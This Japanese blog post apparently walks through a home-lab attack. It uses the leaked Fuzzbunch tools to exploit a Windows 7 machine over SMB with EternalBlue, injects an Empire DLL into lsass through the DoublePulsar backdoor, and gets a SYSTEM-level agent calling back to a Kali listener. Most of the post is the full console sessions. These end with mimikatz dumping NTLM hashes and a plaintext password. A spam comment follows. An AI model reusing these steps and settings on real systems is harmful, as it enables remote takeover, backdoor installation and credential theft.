Doublepulsarでdllを送り込む

今回はDoublepulsarでEMPIREで作成したdllを送り込む。

この検証でwannacryの動作が理解できる。

登場人物は以下3台である。

  1. kali               10.0.2.15   EMPIRにてdllを作成し、victimとセッションを張る
  2. win7(x64) 10.0.2.5  Fuzzbunchを使い、victimPCの脆弱性を突き、dllを送り込む
  3. win7(x86) 10.0.2.4  victim(被害者)。modernIE11を利用している

dllの作成は前回紹介しているため、端折ります。

Eternalblueで脆弱性を突き、Doublepulsarでdllを送り込んでみる。

PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py

--[ Version 3.5.1
・
・
・
[?] Default Target IP Address [] : 10.0.2.4
[?] Default Callback IP Address [] : 127.0.0.1
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index     Project
-----     -------
0         test1
1         Create a New Project

[?] Project [0] :
[?] Set target log directory to 'c:\logs\test1\z10.0.2.4'? [Yes] :
・
・
・
fb > use Eternalblue
・
・
・
[?] Prompt For Variable Settings? [Yes] : Yes

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [10.0.2.4] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled
for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 1


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
・
・
・
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
・
・
・
fb Payload (Doublepulsar) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.0.2.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.0.2.4
TargetPort            445
DllPayload            c:\launcher.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : No
[!] Skipping Prompt

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.0.2.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.0.2.4:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.0.2.4
TargetPort            445
DllPayload            c:\launcher.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] : Yes
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x73E99E05
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

あっさり終了!

次は、kali(EMPIRE)でセッションが張られるのを待つ。セッションが張られたら動作確認。

(Empire: stager/windows/dll) > [+] Initial agent G65ALUR1 from 10.0.2.4 now active (Slack)

(Empire: stager/windows/dll) > interact G65ALUR1
(Empire: G65ALUR1) > sysinfo
(Empire: G65ALUR1) > sysinfo: 0|http://10.0.2.15:8888|WORKGROUP|SYSTEM|IE11WIN7|10.0.2.4|Microsoft Windows 7 Enterprise |True|lsass|476|powershell|2

Listener:         http://10.0.2.15:8888
Internal IP:    10.0.2.4
Username:         WORKGROUP\SYSTEM
Hostname:       IE11WIN7
OS:               Microsoft Windows 7 Enterprise 
High Integrity:   1
Process Name:     lsass
Process ID:       476
Language:         powershell
Language Version: 2


(Empire: G65ALUR1) > shell ipconfig
(Empire: G65ALUR1) > 
Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.0.2.4
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.1

Tunnel adapter isatap.{A2692622-D935-45DD-BC6A-0FEA4F88524C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

..Command execution completed.

(Empire: G65ALUR1) > shellwhoami
[!] Command not recognized.
[*] Use 'help' or 'help agentcmds' to see available commands.
(Empire: G65ALUR1) > shell whoami
(Empire: G65ALUR1) > 
nt authority\system
..Command execution completed.

(Empire: G65ALUR1) > mimikatz
(Empire: G65ALUR1) > 
Job started: LEP823

Hostname: IE11Win7 / authority\system-authority\system

  .#####.   mimikatz 2.1 (x86) built on Dec 11 2016 18:01:05
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 97345 (00000000:00017c41)
Session           : Interactive from 1
User Name         : IEUser
Domain            : IE11WIN7
Logon Server      : IE11WIN7
Logon Time        : 12/23/2017 9:39:13 PM
SID               : S-1-5-21-3463664321-2923530833-3546627382-1000
  msv :	
   [00010000] CredentialKeys
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
   [00000003] Primary
   * Username : IEUser
   * Domain   : IE11WIN7
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
  tspkg :	
  wdigest :	
   * Username : IEUser
   * Domain   : IE11WIN7
   * Password : Passw0rd!

netstatでセッションを確認

(Empire: agents) > rename G65ALUR1 IE11WIN7
(Empire: agents) > interact IE11WIN7
(Empire: IE11WIN7) > shell netstat -no
(Empire: IE11WIN7) > 
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.2.4:49637         168...:80        ESTABLISHED     2684
  TCP    10.0.2.4:49638         121...:443     CLOSE_WAIT      2684
  TCP    10.0.2.4:49639         23...:443       ESTABLISHED     2684
  TCP    10.0.2.4:49642         13...:80         TIME_WAIT       0
  TCP    10.0.2.4:49644         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49645         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49652         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49653         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49654         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49655         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49656         216...:443     ESTABLISHED     2684
  TCP    10.0.2.4:49657         216...:443     ESTABLISHED     2684
  TCP    10.0.2.4:49658         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49659         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49661         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49662         192...:443        ESTABLISHED     2684
  TCP    10.0.2.4:49663         192...:443        CLOSE_WAIT      2684
  TCP    10.0.2.4:49664         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49665         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49666         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49667         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49668         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49669         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49670         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49671         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49672         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49685         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49686         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49688         117...:443     ESTABLISHED     2744

見えていない。

1件のコメント

  1. I’m amazed, I must say. Seⲣdom do I encounter a blog
    that’s eqally educative and interesting, and without a doubt, you’ve
    hit the nail on tһhe head. Thеe issue is something that too few people are speaking intelligently aboսt.

    I’m very happy I stumbled acrosѕ this durіng
    my seɑrch for sоmething regarding this.

ただいまコメントは受け付けていません。